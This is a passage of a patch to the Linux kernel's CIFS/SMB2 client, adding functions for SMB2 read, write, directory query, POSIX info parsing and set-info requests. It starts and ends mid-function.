++		if (rc)
++			goto async_readv_out;
++
++		flags |= CIFS_HAS_CREDITS;
++	}
++
++	kref_get(&rdata->refcount);
++	rc = cifs_call_async(server, &rqst,
++			     cifs_readv_receive, smb2_readv_callback,
++			     smb3_handle_read_data, rdata, flags,
++			     &rdata->credits);
++	if (rc) {
++		kref_put(&rdata->refcount, cifs_readdata_release);
++		cifs_stats_fail_inc(io_parms.tcon, SMB2_READ_HE);
++		trace_smb3_read_err(0 /* xid */, io_parms.persistent_fid,
++				    io_parms.tcon->tid,
++				    io_parms.tcon->ses->Suid,
++				    io_parms.offset, io_parms.length, rc);
++	}
++
++async_readv_out:
++	cifs_small_buf_release(buf);
++	return rc;
++}
++
++int
++SMB2_read(const unsigned int xid, struct cifs_io_parms *io_parms,
++	  unsigned int *nbytes, char **buf, int *buf_type)
++{
++	struct smb_rqst rqst;
++	int resp_buftype, rc;
++	struct smb2_read_req *req = NULL;
++	struct smb2_read_rsp *rsp = NULL;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	unsigned int total_len;
++	int flags = CIFS_LOG_ERROR;
++	struct cifs_ses *ses = io_parms->tcon->ses;
++
++	if (!io_parms->server)
++		io_parms->server = cifs_pick_channel(io_parms->tcon->ses);
++
++	*nbytes = 0;
++	rc = smb2_new_read_req((void **)&req, &total_len, io_parms, NULL, 0, 0);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(io_parms->tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, io_parms->server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_read_rsp *)rsp_iov.iov_base;
++
++	if (rc) {
++		if (rc != -ENODATA) {
++			cifs_stats_fail_inc(io_parms->tcon, SMB2_READ_HE);
++			cifs_dbg(VFS, "Send error in read = %d\n", rc);
++			trace_smb3_read_err(xid,
++					    req->PersistentFileId,
++					    io_parms->tcon->tid, ses->Suid,
++					    io_parms->offset, io_parms->length,
++					    rc);
++		} else
++			trace_smb3_read_done(xid, req->PersistentFileId, io_parms->tcon->tid,
++					     ses->Suid, io_parms->offset, 0);
++		free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++		cifs_small_buf_release(req);
++		return rc == -ENODATA ? 0 : rc;
++	} else
++		trace_smb3_read_done(xid,
++				    req->PersistentFileId,
++				    io_parms->tcon->tid, ses->Suid,
++				    io_parms->offset, io_parms->length);
++
++	cifs_small_buf_release(req);
++
++	*nbytes = le32_to_cpu(rsp->DataLength);
++	if ((*nbytes > CIFS_MAX_MSGSIZE) ||
++	    (*nbytes > io_parms->length)) {
++		cifs_dbg(FYI, "bad length %d for count %d\n",
++			 *nbytes, io_parms->length);
++		rc = -EIO;
++		*nbytes = 0;
++	}
++
++	if (*buf) {
++		memcpy(*buf, (char *)rsp + rsp->DataOffset, *nbytes);
++		free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	} else if (resp_buftype != CIFS_NO_BUFFER) {
++		*buf = rsp_iov.iov_base;
++		if (resp_buftype == CIFS_SMALL_BUFFER)
++			*buf_type = CIFS_SMALL_BUFFER;
++		else if (resp_buftype == CIFS_LARGE_BUFFER)
++			*buf_type = CIFS_LARGE_BUFFER;
++	}
++	return rc;
++}
++
++/*
++ * Check the mid_state and signature on received buffer (if any), and queue the
++ * workqueue completion task.
++ */
++static void
++smb2_writev_callback(struct mid_q_entry *mid)
++{
++	struct cifs_writedata *wdata = mid->callback_data;
++	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
++	struct TCP_Server_Info *server = wdata->server;
++	unsigned int written;
++	struct smb2_write_rsp *rsp = (struct smb2_write_rsp *)mid->resp_buf;
++	struct cifs_credits credits = { .value = 0, .instance = 0 };
++
++	WARN_ONCE(wdata->server != mid->server,
++		  "wdata server %p != mid server %p",
++		  wdata->server, mid->server);
++
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
++		credits.instance = server->reconnect_instance;
++		wdata->result = smb2_check_receive(mid, server, 0);
++		if (wdata->result != 0)
++			break;
++
++		written = le32_to_cpu(rsp->DataLength);
++		/*
++		 * Mask off high 16 bits when bytes written as returned
++		 * by the server is greater than bytes requested by the
++		 * client. OS/2 servers are known to set incorrect
++		 * CountHigh values.
++		 */
++		if (written > wdata->bytes)
++			written &= 0xFFFF;
++
++		if (written < wdata->bytes)
++			wdata->result = -ENOSPC;
++		else
++			wdata->bytes = written;
++		break;
++	case MID_REQUEST_SUBMITTED:
++	case MID_RETRY_NEEDED:
++		wdata->result = -EAGAIN;
++		break;
++	case MID_RESPONSE_MALFORMED:
++		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
++		credits.instance = server->reconnect_instance;
++		fallthrough;
++	default:
++		wdata->result = -EIO;
++		break;
++	}
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/*
++	 * If this wdata has a memory registered, the MR can be freed
++	 * The number of MRs available is limited, it's important to recover
++	 * used MR as soon as I/O is finished. Hold MR longer in the later
++	 * I/O process can possibly result in I/O deadlock due to lack of MR
++	 * to send request on I/O retry
++	 */
++	if (wdata->mr) {
++		smbd_deregister_mr(wdata->mr);
++		wdata->mr = NULL;
++	}
++#endif
++	if (wdata->result) {
++		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
++		trace_smb3_write_err(0 /* no xid */,
++				     wdata->cfile->fid.persistent_fid,
++				     tcon->tid, tcon->ses->Suid, wdata->offset,
++				     wdata->bytes, wdata->result);
++		if (wdata->result == -ENOSPC)
++			pr_warn_once("Out of space writing to %s\n",
++				     tcon->tree_name);
++	} else
++		trace_smb3_write_done(0 /* no xid */,
++				      wdata->cfile->fid.persistent_fid,
++				      tcon->tid, tcon->ses->Suid,
++				      wdata->offset, wdata->bytes);
++
++	queue_work(cifsiod_wq, &wdata->work);
++	release_mid(mid);
++	add_credits(server, &credits, 0);
++}
++
++/* smb2_async_writev - send an async write, and set up mid to handle result */
++int
++smb2_async_writev(struct cifs_writedata *wdata,
++		  void (*release)(struct kref *kref))
++{
++	int rc = -EACCES, flags = 0;
++	struct smb2_write_req *req = NULL;
++	struct smb2_hdr *shdr;
++	struct cifs_tcon *tcon = tlink_tcon(wdata->cfile->tlink);
++	struct TCP_Server_Info *server = wdata->server;
++	struct kvec iov[1];
++	struct smb_rqst rqst = { };
++	unsigned int total_len;
++	struct cifs_io_parms _io_parms;
++	struct cifs_io_parms *io_parms = NULL;
++
++	if (!wdata->server)
++		server = wdata->server = cifs_pick_channel(tcon->ses);
++
++	/*
++	 * in future we may get cifs_io_parms passed in from the caller,
++	 * but for now we construct it here...
++	 */
++	_io_parms = (struct cifs_io_parms) {
++		.tcon = tcon,
++		.server = server,
++		.offset = wdata->offset,
++		.length = wdata->bytes,
++		.persistent_fid = wdata->cfile->fid.persistent_fid,
++		.volatile_fid = wdata->cfile->fid.volatile_fid,
++		.pid = wdata->pid,
++	};
++	io_parms = &_io_parms;
++
++	rc = smb2_plain_req_init(SMB2_WRITE, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	shdr = (struct smb2_hdr *)req;
++	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
++
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
++	req->WriteChannelInfoOffset = 0;
++	req->WriteChannelInfoLength = 0;
++	req->Channel = 0;
++	req->Offset = cpu_to_le64(io_parms->offset);
++	req->DataOffset = cpu_to_le16(
++				offsetof(struct smb2_write_req, Buffer));
++	req->RemainingBytes = 0;
++
++	trace_smb3_write_enter(0 /* xid */,
++			       io_parms->persistent_fid,
++			       io_parms->tcon->tid,
++			       io_parms->tcon->ses->Suid,
++			       io_parms->offset,
++			       io_parms->length);
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/*
++	 * If we want to do a server RDMA read, fill in and append
++	 * smbd_buffer_descriptor_v1 to the end of write request
++	 */
++	if (smb3_use_rdma_offload(io_parms)) {
++		struct smbd_buffer_descriptor_v1 *v1;
++		bool need_invalidate = server->dialect == SMB30_PROT_ID;
++
++		wdata->mr = smbd_register_mr(
++				server->smbd_conn, wdata->pages,
++				wdata->nr_pages, wdata->page_offset,
++				wdata->tailsz, false, need_invalidate);
++		if (!wdata->mr) {
++			rc = -EAGAIN;
++			goto async_writev_out;
++		}
++		req->Length = 0;
++		req->DataOffset = 0;
++		if (wdata->nr_pages > 1)
++			req->RemainingBytes =
++				cpu_to_le32(
++					(wdata->nr_pages - 1) * wdata->pagesz -
++					wdata->page_offset + wdata->tailsz
++				);
++		else
++			req->RemainingBytes = cpu_to_le32(wdata->tailsz);
++		req->Channel = SMB2_CHANNEL_RDMA_V1_INVALIDATE;
++		if (need_invalidate)
++			req->Channel = SMB2_CHANNEL_RDMA_V1;
++		req->WriteChannelInfoOffset =
++			cpu_to_le16(offsetof(struct smb2_write_req, Buffer));
++		req->WriteChannelInfoLength =
++			cpu_to_le16(sizeof(struct smbd_buffer_descriptor_v1));
++		v1 = (struct smbd_buffer_descriptor_v1 *) &req->Buffer[0];
++		v1->offset = cpu_to_le64(wdata->mr->mr->iova);
++		v1->token = cpu_to_le32(wdata->mr->mr->rkey);
++		v1->length = cpu_to_le32(wdata->mr->mr->length);
++	}
++#endif
++	iov[0].iov_len = total_len - 1;
++	iov[0].iov_base = (char *)req;
++
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++	rqst.rq_pages = wdata->pages;
++	rqst.rq_offset = wdata->page_offset;
++	rqst.rq_npages = wdata->nr_pages;
++	rqst.rq_pagesz = wdata->pagesz;
++	rqst.rq_tailsz = wdata->tailsz;
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (wdata->mr) {
++		iov[0].iov_len += sizeof(struct smbd_buffer_descriptor_v1);
++		rqst.rq_npages = 0;
++	}
++#endif
++	cifs_dbg(FYI, "async write at %llu %u bytes\n",
++		 io_parms->offset, io_parms->length);
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	/* For RDMA read, I/O size is in RemainingBytes not in Length */
++	if (!wdata->mr)
++		req->Length = cpu_to_le32(io_parms->length);
++#else
++	req->Length = cpu_to_le32(io_parms->length);
++#endif
++
++	if (wdata->credits.value > 0) {
++		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(wdata->bytes,
++						    SMB2_MAX_BUFFER_SIZE));
++		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
++
++		rc = adjust_credits(server, &wdata->credits, io_parms->length);
++		if (rc)
++			goto async_writev_out;
++
++		flags |= CIFS_HAS_CREDITS;
++	}
++
++	kref_get(&wdata->refcount);
++	rc = cifs_call_async(server, &rqst, NULL, smb2_writev_callback, NULL,
++			     wdata, flags, &wdata->credits);
++
++	if (rc) {
++		trace_smb3_write_err(0 /* no xid */,
++				     io_parms->persistent_fid,
++				     io_parms->tcon->tid,
++				     io_parms->tcon->ses->Suid,
++				     io_parms->offset,
++				     io_parms->length,
++				     rc);
++		kref_put(&wdata->refcount, release);
++		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
++	}
++
++async_writev_out:
++	cifs_small_buf_release(req);
++	return rc;
++}
++
++/*
++ * SMB2_write function gets iov pointer to kvec array with n_vec as a length.
++ * The length field from io_parms must be at least 1 and indicates a number of
++ * elements with data to write that begins with position 1 in iov array. All
++ * data length is specified by count.
++ */
++int
++SMB2_write(const unsigned int xid, struct cifs_io_parms *io_parms,
++	   unsigned int *nbytes, struct kvec *iov, int n_vec)
++{
++	struct smb_rqst rqst;
++	int rc = 0;
++	struct smb2_write_req *req = NULL;
++	struct smb2_write_rsp *rsp = NULL;
++	int resp_buftype;
++	struct kvec rsp_iov;
++	int flags = 0;
++	unsigned int total_len;
++	struct TCP_Server_Info *server;
++
++	*nbytes = 0;
++
++	if (n_vec < 1)
++		return rc;
++
++	if (!io_parms->server)
++		io_parms->server = cifs_pick_channel(io_parms->tcon->ses);
++	server = io_parms->server;
++	if (server == NULL)
++		return -ECONNABORTED;
++
++	rc = smb2_plain_req_init(SMB2_WRITE, io_parms->tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(io_parms->tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
++
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
++	req->WriteChannelInfoOffset = 0;
++	req->WriteChannelInfoLength = 0;
++	req->Channel = 0;
++	req->Length = cpu_to_le32(io_parms->length);
++	req->Offset = cpu_to_le64(io_parms->offset);
++	req->DataOffset = cpu_to_le16(
++				offsetof(struct smb2_write_req, Buffer));
++	req->RemainingBytes = 0;
++
++	trace_smb3_write_enter(xid, io_parms->persistent_fid,
++		io_parms->tcon->tid, io_parms->tcon->ses->Suid,
++		io_parms->offset, io_parms->length);
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for Buffer */
++	iov[0].iov_len = total_len - 1;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = n_vec + 1;
++
++	rc = cifs_send_recv(xid, io_parms->tcon->ses, server,
++			    &rqst,
++			    &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_write_rsp *)rsp_iov.iov_base;
++
++	if (rc) {
++		trace_smb3_write_err(xid,
++				     req->PersistentFileId,
++				     io_parms->tcon->tid,
++				     io_parms->tcon->ses->Suid,
++				     io_parms->offset, io_parms->length, rc);
++		cifs_stats_fail_inc(io_parms->tcon, SMB2_WRITE_HE);
++		cifs_dbg(VFS, "Send error in write = %d\n", rc);
++	} else {
++		*nbytes = le32_to_cpu(rsp->DataLength);
++		trace_smb3_write_done(xid,
++				      req->PersistentFileId,
++				      io_parms->tcon->tid,
++				      io_parms->tcon->ses->Suid,
++				      io_parms->offset, *nbytes);
++	}
++
++	cifs_small_buf_release(req);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int posix_info_sid_size(const void *beg, const void *end)
++{
++	size_t subauth;
++	int total;
++
++	if (beg + 1 > end)
++		return -1;
++
++	subauth = *(u8 *)(beg+1);
++	if (subauth < 1 || subauth > 15)
++		return -1;
++
++	total = 1 + 1 + 6 + 4*subauth;
++	if (beg + total > end)
++		return -1;
++
++	return total;
++}
++
++int posix_info_parse(const void *beg, const void *end,
++		     struct smb2_posix_info_parsed *out)
++
++{
++	int total_len = 0;
++	int owner_len, group_len;
++	int name_len;
++	const void *owner_sid;
++	const void *group_sid;
++	const void *name;
++
++	/* if no end bound given, assume payload to be correct */
++	if (!end) {
++		const struct smb2_posix_info *p = beg;
++
++		end = beg + le32_to_cpu(p->NextEntryOffset);
++		/* last element will have a 0 offset, pick a sensible bound */
++		if (end == beg)
++			end += 0xFFFF;
++	}
++
++	/* check base buf */
++	if (beg + sizeof(struct smb2_posix_info) > end)
++		return -1;
++	total_len = sizeof(struct smb2_posix_info);
++
++	/* check owner sid */
++	owner_sid = beg + total_len;
++	owner_len = posix_info_sid_size(owner_sid, end);
++	if (owner_len < 0)
++		return -1;
++	total_len += owner_len;
++
++	/* check group sid */
++	group_sid = beg + total_len;
++	group_len = posix_info_sid_size(group_sid, end);
++	if (group_len < 0)
++		return -1;
++	total_len += group_len;
++
++	/* check name len */
++	if (beg + total_len + 4 > end)
++		return -1;
++	name_len = le32_to_cpu(*(__le32 *)(beg + total_len));
++	if (name_len < 1 || name_len > 0xFFFF)
++		return -1;
++	total_len += 4;
++
++	/* check name */
++	name = beg + total_len;
++	if (name + name_len > end)
++		return -1;
++	total_len += name_len;
++
++	if (out) {
++		out->base = beg;
++		out->size = total_len;
++		out->name_len = name_len;
++		out->name = name;
++		memcpy(&out->owner, owner_sid, owner_len);
++		memcpy(&out->group, group_sid, group_len);
++	}
++	return total_len;
++}
++
++static int posix_info_extra_size(const void *beg, const void *end)
++{
++	int len = posix_info_parse(beg, end, NULL);
++
++	if (len < 0)
++		return -1;
++	return len - sizeof(struct smb2_posix_info);
++}
++
++static unsigned int
++num_entries(int infotype, char *bufstart, char *end_of_buf, char **lastentry,
++	    size_t size)
++{
++	int len;
++	unsigned int entrycount = 0;
++	unsigned int next_offset = 0;
++	char *entryptr;
++	FILE_DIRECTORY_INFO *dir_info;
++
++	if (bufstart == NULL)
++		return 0;
++
++	entryptr = bufstart;
++
++	while (1) {
++		if (entryptr + next_offset < entryptr ||
++		    entryptr + next_offset > end_of_buf ||
++		    entryptr + next_offset + size > end_of_buf) {
++			cifs_dbg(VFS, "malformed search entry would overflow\n");
++			break;
++		}
++
++		entryptr = entryptr + next_offset;
++		dir_info = (FILE_DIRECTORY_INFO *)entryptr;
++
++		if (infotype == SMB_FIND_FILE_POSIX_INFO)
++			len = posix_info_extra_size(entryptr, end_of_buf);
++		else
++			len = le32_to_cpu(dir_info->FileNameLength);
++
++		if (len < 0 ||
++		    entryptr + len < entryptr ||
++		    entryptr + len > end_of_buf ||
++		    entryptr + len + size > end_of_buf) {
++			cifs_dbg(VFS, "directory entry name would overflow frame end of buf %p\n",
++				 end_of_buf);
++			break;
++		}
++
++		*lastentry = entryptr;
++		entrycount++;
++
++		next_offset = le32_to_cpu(dir_info->NextEntryOffset);
++		if (!next_offset)
++			break;
++	}
++
++	return entrycount;
++}
++
++/*
++ * Readdir/FindFirst
++ */
++int SMB2_query_directory_init(const unsigned int xid,
++			      struct cifs_tcon *tcon,
++			      struct TCP_Server_Info *server,
++			      struct smb_rqst *rqst,
++			      u64 persistent_fid, u64 volatile_fid,
++			      int index, int info_level)
++{
++	struct smb2_query_directory_req *req;
++	unsigned char *bufptr;
++	__le16 asteriks = cpu_to_le16('*');
++	unsigned int output_size = CIFSMaxBufSize -
++		MAX_SMB2_CREATE_RESPONSE_SIZE -
++		MAX_SMB2_CLOSE_RESPONSE_SIZE;
++	unsigned int total_len;
++	struct kvec *iov = rqst->rq_iov;
++	int len, rc;
++
++	rc = smb2_plain_req_init(SMB2_QUERY_DIRECTORY, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	switch (info_level) {
++	case SMB_FIND_FILE_DIRECTORY_INFO:
++		req->FileInformationClass = FILE_DIRECTORY_INFORMATION;
++		break;
++	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
++		req->FileInformationClass = FILEID_FULL_DIRECTORY_INFORMATION;
++		break;
++	case SMB_FIND_FILE_POSIX_INFO:
++		req->FileInformationClass = SMB_FIND_FILE_POSIX_INFO;
++		break;
++	default:
++		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
++			info_level);
++		return -EINVAL;
++	}
++
++	req->FileIndex = cpu_to_le32(index);
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++
++	len = 0x2;
++	bufptr = req->Buffer;
++	memcpy(bufptr, &asteriks, len);
++
++	req->FileNameOffset =
++		cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1);
++	req->FileNameLength = cpu_to_le16(len);
++	/*
++	 * BB could be 30 bytes or so longer if we used SMB2 specific
++	 * buffer lengths, but this is safe and close enough.
++	 */
++	output_size = min_t(unsigned int, output_size, server->maxBuf);
++	output_size = min_t(unsigned int, output_size, 2 << 15);
++	req->OutputBufferLength = cpu_to_le32(output_size);
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for Buffer */
++	iov[0].iov_len = total_len - 1;
++
++	iov[1].iov_base = (char *)(req->Buffer);
++	iov[1].iov_len = len;
++
++	trace_smb3_query_dir_enter(xid, persistent_fid, tcon->tid,
++			tcon->ses->Suid, index, output_size);
++
++	return 0;
++}
++
++void SMB2_query_directory_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov) {
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++	}
++}
++
++int
++smb2_parse_query_directory(struct cifs_tcon *tcon,
++			   struct kvec *rsp_iov,
++			   int resp_buftype,
++			   struct cifs_search_info *srch_inf)
++{
++	struct smb2_query_directory_rsp *rsp;
++	size_t info_buf_size;
++	char *end_of_smb;
++	int rc;
++
++	rsp = (struct smb2_query_directory_rsp *)rsp_iov->iov_base;
++
++	switch (srch_inf->info_level) {
++	case SMB_FIND_FILE_DIRECTORY_INFO:
++		info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
++		break;
++	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
++		info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
++		break;
++	case SMB_FIND_FILE_POSIX_INFO:
++		/* note that posix payload are variable size */
++		info_buf_size = sizeof(struct smb2_posix_info);
++		break;
++	default:
++		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
++			 srch_inf->info_level);
++		return -EINVAL;
++	}
++
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength), rsp_iov,
++			       info_buf_size);
++	if (rc) {
++		cifs_tcon_dbg(VFS, "bad info payload");
++		return rc;
++	}
++
++	srch_inf->unicode = true;
++
++	if (srch_inf->ntwrk_buf_start) {
++		if (srch_inf->smallBuf)
++			cifs_small_buf_release(srch_inf->ntwrk_buf_start);
++		else
++			cifs_buf_release(srch_inf->ntwrk_buf_start);
++	}
++	srch_inf->ntwrk_buf_start = (char *)rsp;
++	srch_inf->srch_entries_start = srch_inf->last_entry =
++		(char *)rsp + le16_to_cpu(rsp->OutputBufferOffset);
++	end_of_smb = rsp_iov->iov_len + (char *)rsp;
++
++	srch_inf->entries_in_buffer = num_entries(
++		srch_inf->info_level,
++		srch_inf->srch_entries_start,
++		end_of_smb,
++		&srch_inf->last_entry,
++		info_buf_size);
++
++	srch_inf->index_of_last_entry += srch_inf->entries_in_buffer;
++	cifs_dbg(FYI, "num entries %d last_index %lld srch start %p srch end %p\n",
++		 srch_inf->entries_in_buffer, srch_inf->index_of_last_entry,
++		 srch_inf->srch_entries_start, srch_inf->last_entry);
++	if (resp_buftype == CIFS_LARGE_BUFFER)
++		srch_inf->smallBuf = false;
++	else if (resp_buftype == CIFS_SMALL_BUFFER)
++		srch_inf->smallBuf = true;
++	else
++		cifs_tcon_dbg(VFS, "Invalid search buffer type\n");
++
++	return 0;
++}
++
++int
++SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
++		     u64 persistent_fid, u64 volatile_fid, int index,
++		     struct cifs_search_info *srch_inf)
++{
++	struct smb_rqst rqst;
++	struct kvec iov[SMB2_QUERY_DIRECTORY_IOV_SIZE];
++	struct smb2_query_directory_rsp *rsp = NULL;
++	int resp_buftype = CIFS_NO_BUFFER;
++	struct kvec rsp_iov;
++	int rc = 0;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int flags = 0;
++
++	if (!ses || !(ses->server))
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = SMB2_QUERY_DIRECTORY_IOV_SIZE;
++
++	rc = SMB2_query_directory_init(xid, tcon, server,
++				       &rqst, persistent_fid,
++				       volatile_fid, index,
++				       srch_inf->info_level);
++	if (rc)
++		goto qdir_exit;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_query_directory_rsp *)rsp_iov.iov_base;
++
++	if (rc) {
++		if (rc == -ENODATA &&
++		    rsp->hdr.Status == STATUS_NO_MORE_FILES) {
++			trace_smb3_query_dir_done(xid, persistent_fid,
++				tcon->tid, tcon->ses->Suid, index, 0);
++			srch_inf->endOfSearch = true;
++			rc = 0;
++		} else {
++			trace_smb3_query_dir_err(xid, persistent_fid, tcon->tid,
++				tcon->ses->Suid, index, 0, rc);
++			cifs_stats_fail_inc(tcon, SMB2_QUERY_DIRECTORY_HE);
++		}
++		goto qdir_exit;
++	}
++
++	rc = smb2_parse_query_directory(tcon, &rsp_iov,	resp_buftype,
++					srch_inf);
++	if (rc) {
++		trace_smb3_query_dir_err(xid, persistent_fid, tcon->tid,
++			tcon->ses->Suid, index, 0, rc);
++		goto qdir_exit;
++	}
++	resp_buftype = CIFS_NO_BUFFER;
++
++	trace_smb3_query_dir_done(xid, persistent_fid, tcon->tid,
++			tcon->ses->Suid, index, srch_inf->entries_in_buffer);
++
++qdir_exit:
++	SMB2_query_directory_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int
++SMB2_set_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		   struct smb_rqst *rqst,
++		   u64 persistent_fid, u64 volatile_fid, u32 pid,
++		   u8 info_class, u8 info_type, u32 additional_info,
++		   void **data, unsigned int *size)
++{
++	struct smb2_set_info_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int i, total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_SET_INFO, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(pid);
++	req->InfoType = info_type;
++	req->FileInfoClass = info_class;
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	req->AdditionalInformation = cpu_to_le32(additional_info);
++
++	req->BufferOffset =
++			cpu_to_le16(sizeof(struct smb2_set_info_req) - 1);
++	req->BufferLength = cpu_to_le32(*size);
++
++	memcpy(req->Buffer, *data, *size);
++	total_len += *size;
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for Buffer */
++	iov[0].iov_len = total_len - 1;
++
++	for (i = 1; i < rqst->rq_nvec; i++) {
++		le32_add_cpu(&req->BufferLength, size[i]);
++		iov[i].iov_base = (char *)data[i];
++		iov[i].iov_len = size[i];
++	}
++
++	return 0;
++}
++
++void
++SMB2_set_info_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov)
++		cifs_buf_release(rqst->rq_iov[0].iov_base); /* request */
++}
++
++static int
++send_set_info(const unsigned int xid, struct cifs_tcon *tcon,
++	       u64 persistent_fid, u64 volatile_fid, u32 pid, u8 info_class,
++	       u8 info_type, u32 additional_info, unsigned int num,
++		void **data, unsigned int *size)
++{
++	struct smb_rqst rqst;
++	struct smb2_set_info_rsp *rsp = NULL;
++	struct kvec *iov;
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int flags = 0;
++
++	if (!ses || !server)
++		return -EIO;
++
++	if (!num)
++		return -EINVAL;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	iov = kmalloc_array(num, sizeof(struct kvec), GFP_KERNEL);
++	if (!iov)
++		return -ENOMEM;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = num;
++
++	rc = SMB2_set_info_init(tcon, server,
++				&rqst, persistent_fid, volatile_fid, pid,
++				info_class, info_type, additional_info,
++				data, size);
++	if (rc) {
++		kfree(iov);
++		return rc;
++	}
++
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags,
++			    &rsp_iov);
++	SMB2_set_info_free(&rqst);
++	rsp = (struct smb2_set_info_rsp *)rsp_iov.iov_base;
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_SET_INFO_HE);
++		trace_smb3_set_info_err(xid, persistent_fid, tcon->tid,
++				ses->Suid, info_class, (__u32)info_type, rc);
++	}
++
++	free_rsp_buf(resp_buftype, rsp);
++	kfree(iov);
++	return rc;
++}
++
++int
++SMB2_set_eof(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
++	     u64 volatile_fid, u32 pid, __le64 *eof)
++{
++	struct smb2_file_eof_info info;
++	void *data;
++	unsigned int size;
++
++	info.EndOfFile = *eof;
++
++	data = &info;
++	size = sizeof(struct smb2_file_eof_info);
++
++	trace_smb3_set_eof(xid, persistent_fid, tcon->tid, tcon->ses->Suid, le64_to_cpu(*eof));
++
++	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
++			pid, FILE_END_OF_FILE_INFORMATION, SMB2_O_INFO_FILE,
++			0, 1, &data, &size);
++}
++
++int
++SMB2_set_acl(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid,
++		struct cifs_ntsd *pnntsd, int pacllen, int aclflag)
++{
++	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
++			current->tgid, 0, SMB2_O_INFO_SECURITY, aclflag,
++			1, (void **)&pnntsd, &pacllen);
++}
++
++int
++SMB2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
++	    u64 persistent_fid, u64 volatile_fid,
++	    struct smb2_file_full_ea_info *buf, int len)
++{
++	return send_set_info(xid, tcon, persistent_fid, volatile_fid,
++		current->tgid, FILE_FULL_EA_INFORMATION, SMB2_O_INFO_FILE,
++		0, 1, (void **)&buf, &len);
++}
++
++int
++SMB2_oplock_break(const unsigned int xid, struct cifs_tcon *tcon,
++		  const u64 persistent_fid, const u64 volatile_fid,
